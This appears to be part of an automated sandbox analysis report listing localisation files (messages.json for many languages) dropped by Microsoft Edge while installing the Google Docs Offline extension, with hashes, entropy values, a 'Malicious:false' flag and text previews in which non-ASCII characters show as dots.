                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\sw\messages.json

